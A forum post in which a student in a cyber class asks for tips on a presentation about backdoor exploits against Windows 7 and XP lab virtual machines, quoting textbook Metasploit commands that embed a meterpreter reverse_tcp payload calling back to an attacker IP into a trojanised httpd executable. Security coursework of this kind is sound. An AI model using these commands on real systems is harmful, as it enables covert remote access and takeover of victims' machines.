I'm in a cyber class and struggling on my presentation. I have to give a brief on exploitation and I signed up for doing a backdoor exploit. Looking for tips and outlines to follow

I am running a Linux VM and my target options are a Windows 7 and Windows XP VMs.

I wanted to do something like out textbook that did something like this ( i know its only a small snippet):

msf exploit(ms17_010_eternalblue) > use payload/windows/x64/meterpreter/reverse_tcp
msf payload(reverse_tcp) > set LHOST 192.168.216.5
LHOST => 192.168.216.5
msf payload(reverse_tcp) > generate -a x64 -p Windows -x /root/httpd.exe -k -t exe -f httpd-backdoored.exe
[*] Writing 29184 bytes to httpd-backdoored.exe...
msf payload(reverse_tcp) >

I've tried: eternal blue, mysql_enum, psexec, adobe_flash_hacking_team_uaf.

Payload obviously reverse_tcp

None of these seemed to get me into a backdoor. I don't want to use MS08_067_netapi since we used that in class already